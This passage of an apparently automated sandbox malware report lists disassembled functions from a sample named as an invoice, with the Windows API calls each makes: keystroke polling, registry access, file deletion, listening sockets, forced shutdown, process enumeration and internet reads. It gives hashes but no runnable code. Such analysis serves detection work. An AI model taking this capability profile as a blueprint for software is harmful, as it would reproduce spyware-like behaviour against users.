                                                              • _wcscpy.LIBCMT ref: 002364A3
                                                              • _wcscat.LIBCMT ref: 002364B8
                                                              • _wcscat.LIBCMT ref: 002364CA
                                                              • DeleteFileW.KERNEL32(?), ref: 002364DA
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 002364EB
                                                              • FindClose.KERNEL32(00000000), ref: 00236506
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                              • String ID: \*.*$p1#v`K$v
                                                              • API String ID: 2643075503-1732502266
                                                              • Opcode ID: 64f2b47bc6b5b2fd093d75982679822690d6646cc6b5a18a492d6b8f32975186
                                                              • Instruction ID: a9f4a502e150fc00a2a7775d81884f51346505b1198d0f6ae5bc45747b4dfa70
                                                              • Opcode Fuzzy Hash: 64f2b47bc6b5b2fd093d75982679822690d6646cc6b5a18a492d6b8f32975186
                                                              • Instruction Fuzzy Hash: C431D6F24183846AC321DFA48889DDBB7ECAF56300F40492AF6D8C3141EA31D55D8BA3
                                                              Function 002531BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00253C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00252BB5,?,?), ref: 00253C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025328E
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0025332D
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002533C5
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00253604
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00253611
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: d4dd52385403d8fd1fa07685e12e627565c82cf5782bd108b75c63032a3b66c9
                                                              • Instruction ID: 30676a0bd33885cc429543ad7f42221139dda510ac3ac4f65f1e213f0af1066c
                                                              • Opcode Fuzzy Hash: d4dd52385403d8fd1fa07685e12e627565c82cf5782bd108b75c63032a3b66c9
                                                              • Instruction Fuzzy Hash: B9E16B71614204AFCB14DF28C995E2ABBE8FF88750F04946DF94ADB2A1DB30ED15CB81
                                                              Function 00232B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00232B5F
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00232BE0
                                                              • GetKeyState.USER32(000000A0), ref: 00232BFB
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00232C15
                                                              • GetKeyState.USER32(000000A1), ref: 00232C2A
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00232C42
                                                              • GetKeyState.USER32(00000011), ref: 00232C54
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00232C6C
                                                              • GetKeyState.USER32(00000012), ref: 00232C7E
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00232C96
                                                              • GetKeyState.USER32(0000005B), ref: 00232CA8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: c2b3813d778c6ea8063334ad37c7effa0d85f80eae2dc26fa6e11e5742045a12
                                                              • Instruction ID: af810e2eb91207e42f9ae7eb4fb3249d7a77157eb63448e31724bab53a998bca
                                                              • Opcode Fuzzy Hash: c2b3813d778c6ea8063334ad37c7effa0d85f80eae2dc26fa6e11e5742045a12
                                                              • Instruction Fuzzy Hash: 7A4107B06147CBAEFF359F6488443A9FEB16F11308F04944BD5C6562C1DBA499ECC7A2
                                                              Function 00246D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: 9d4b5eb93db00d9a3ccded3c4b811852dcd38b7f4fa13102a99c83c279833de0
                                                              • Instruction ID: 4b2da58f39c99c9dc8dfdc1f6341d1327bec79d3ea362582e30e24a4c074a4fe
                                                              • Opcode Fuzzy Hash: 9d4b5eb93db00d9a3ccded3c4b811852dcd38b7f4fa13102a99c83c279833de0
                                                              • Instruction Fuzzy Hash: 26219C31720610EFDB05AF64EC4DB2D77A8FF45711F14841AF90ADB2A2CB70E8A18B95
                                                              Function 0024C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00229ABF: CLSIDFromProgID.OLE32 ref: 00229ADC
                                                                • Part of subcall function 00229ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00229AF7
                                                                • Part of subcall function 00229ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00229B05
                                                                • Part of subcall function 00229ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00229B15
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0024C235
                                                              • _memset.LIBCMT ref: 0024C242
                                                              • _memset.LIBCMT ref: 0024C360
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0024C38C
                                                              • CoTaskMemFree.OLE32(?), ref: 0024C397
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 0024C3E5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              • Opcode ID: 788e5ea7e8347ef5e892ab78ffc3db8c580b72aace2a53cf4f5ff2302883138a
                                                              • Instruction ID: dabd2948e482b8a6c8fbb6cb2f412c888096fd99bb2f0fa3d2729b4e776f85c2
                                                              • Opcode Fuzzy Hash: 788e5ea7e8347ef5e892ab78ffc3db8c580b72aace2a53cf4f5ff2302883138a
                                                              • Instruction Fuzzy Hash: 91916D71D11218EBDB14DF94DC85EEEBBB9EF04310F20816AF919A7281DB705A55CFA0
                                                              Function 002379D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0022B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022B180
                                                                • Part of subcall function 0022B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022B1AD
                                                                • Part of subcall function 0022B134: GetLastError.KERNEL32 ref: 0022B1BA
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00237A0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: 2472affa75e6f83909ed4f1dd3243fed54588d054b5d6962186e522a1b43d51e
                                                              • Instruction ID: c5b3cdb82b7322ac4fae2b277a26aba83f5e0dce32f4e40e9e8b21a29cb6f233
                                                              • Opcode Fuzzy Hash: 2472affa75e6f83909ed4f1dd3243fed54588d054b5d6962186e522a1b43d51e
                                                              • Instruction Fuzzy Hash: 0C01A7F17782226FFF385A649C9BBBF72689B00741F240524FD43A21D2E9A19E2181B0
                                                              Function 00248C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00248CA8
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248CB7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00248CD3
                                                              • listen.WSOCK32(00000000,00000005), ref: 00248CE2
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248CFC
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00248D10
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: 86680ee6aecfdc4c288aa6daba1a08cd7ad490cb60f04adb27bcb42b647613d3
                                                              • Instruction ID: 6b140ab9ec603bd98b7e7c40ed36450bbaf68b856fffd274a25010ff95eaf676
                                                              • Opcode Fuzzy Hash: 86680ee6aecfdc4c288aa6daba1a08cd7ad490cb60f04adb27bcb42b647613d3
                                                              • Instruction Fuzzy Hash: 0E21D0316102019FCB18EF28DC89B7EB7B9FF48710F10815AF916AB2D2CB70AD428B51
                                                              Function 00236532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00236554
                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00236564
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00236583
                                                              • __wsplitpath.LIBCMT ref: 002365A7
                                                              • _wcscat.LIBCMT ref: 002365BA
                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 002365F9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                              • String ID:
                                                              • API String ID: 1605983538-0
                                                              • Opcode ID: 9ed09bc115877ece2cacc33cca9b4a9a0d48c28023eb0ecea43d6fd0f2745358
                                                              • Instruction ID: 1fb360cfd94c0b0dfd3add8ef2ee1461d834d5d2ef4de4504642750eda2af1e1
                                                              • Opcode Fuzzy Hash: 9ed09bc115877ece2cacc33cca9b4a9a0d48c28023eb0ecea43d6fd0f2745358
                                                              • Instruction Fuzzy Hash: 722141B1910219ABDB20AFA4DC89BD9B7BCAB54300F9044A5E509E7141DBB19B95CF60
                                                              Function 001F9B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$)
                                                              • API String ID: 0-3714085877
                                                              • Opcode ID: 5619f3db63501fcc88c5dc097ff60d952722404df5bef4b6e5a275c54d79cbe9
                                                              • Instruction ID: f4eb8105e703c2fa9816024bd77a37115c8daff87e041ecb0f0fa617ae2093ac
                                                              • Opcode Fuzzy Hash: 5619f3db63501fcc88c5dc097ff60d952722404df5bef4b6e5a275c54d79cbe9
                                                              • Instruction Fuzzy Hash: AC92C071E0021ACBDF28DF68C8507BDB7B1BF54310F6581AAE91AAB280D7749D91CF91
                                                              Function 002313CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002313DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($,2*$<2*$|
                                                              • API String ID: 1659193697-3871408827
                                                              • Opcode ID: 60f34117507d8837ecca7f5b9706e493357a500f3c0d18117e56467eb32dd608
                                                              • Instruction ID: f413be53c25e9286b60540a24cfcbf98ec1786a803ee62e50fb2a41a571108e2
                                                              • Opcode Fuzzy Hash: 60f34117507d8837ecca7f5b9706e493357a500f3c0d18117e56467eb32dd608
                                                              • Instruction Fuzzy Hash: 173214B5A107059FC728CF69C480A6AB7F0FF48310B15C56EE59ADB3A2E770E961CB44
                                                              Function 0024923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0024A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0024A84E
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00249296
                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 002492B9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 4170576061-0
                                                              • Opcode ID: 44e9d793c6c38a3198ffa8991c735b02f9e1f96685c9c480af6d651bc733e8ed
                                                              • Instruction ID: 8aa68dae6e375c4eac4f83b8a2cb99b6a9af1b7736f73f1abc9020e2ff976192
                                                              • Opcode Fuzzy Hash: 44e9d793c6c38a3198ffa8991c735b02f9e1f96685c9c480af6d651bc733e8ed
                                                              • Instruction Fuzzy Hash: 5141CE70610204AFEB14BF28C886E7EB7EDEF44724F148549F956AB2C2CBB49D518B91
                                                              Function 0023EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0023EB8A
                                                              • _wcscmp.LIBCMT ref: 0023EBBA
                                                              • _wcscmp.LIBCMT ref: 0023EBCF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0023EBE0
                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0023EC0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 2387731787-0
                                                              • Opcode ID: f4250408afb8b44937d6d175227e0069ad2f0b970ce51f199c9d9fb001b1355f
                                                              • Instruction ID: 3946102574f2a609407318074926cd816f422b3746a090224d4edca2f9536afd
                                                              • Opcode Fuzzy Hash: f4250408afb8b44937d6d175227e0069ad2f0b970ce51f199c9d9fb001b1355f
                                                              • Instruction Fuzzy Hash: DD41DF74614302CFCB08DF28C490A9AB3E4FF49324F10451EE95A8B3E2DB31A969CF91
                                                              Function 00258111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 0fdac14bd582db45c75257f24f7537f8429993f8088fecc121b481134ea7bd02
                                                              • Instruction ID: bb65aa2b4c15ef1d96aacabf9f52a00998b3c69f34860f89ff489e84b8464895
                                                              • Opcode Fuzzy Hash: 0fdac14bd582db45c75257f24f7537f8429993f8088fecc121b481134ea7bd02
                                                              • Instruction Fuzzy Hash: 9111B6313106116BE7211F26EC48A6F77ADEF54761B054419F84DE7141CFB099568BA8
                                                              Function 0020E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0020E014,76230AE0,0020DEF1,0028DC38,?,?), ref: 0020E02C
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0020E03E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 214fc9cfd016032fdab756acec42d468cb3a4ad3540b467440dee035cb58b41e
                                                              • Instruction ID: 4d49e82b753960580bd59be6506f4467fa118570c3487b2d71fbc0080d6e951e
                                                              • Opcode Fuzzy Hash: 214fc9cfd016032fdab756acec42d468cb3a4ad3540b467440dee035cb58b41e
                                                              • Instruction Fuzzy Hash: 68D0A7B0460713DFCB314F64FD0C61277E5AF02310F19481AE88AE2190DBB4D8D4C750
                                                              Function 0020B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 0020B22F
                                                                • Part of subcall function 0020B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0020B5A5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Proc$LongWindow
                                                              • String ID:
                                                              • API String ID: 2749884682-0
                                                              • Opcode ID: 8a76eddbdf8be696c9742cb79a75c997ed225c64b1d69fe4285282a0eceb3512
                                                              • Instruction ID: d9a2fce38ea692837da5bbaeb1b15dca7e9c282a829e67e54dbea86a83b439b3
                                                              • Opcode Fuzzy Hash: 8a76eddbdf8be696c9742cb79a75c997ed225c64b1d69fe4285282a0eceb3512
                                                              • Instruction Fuzzy Hash: D4A15470134306BFDB3A6F2A5C99EBF2A6CEB52740B610119FC02D21D3DB649C709672
                                                              Function 00244EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002443BF,00000000), ref: 00244FA6
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00244FD2
                                                              Memory Dump Source
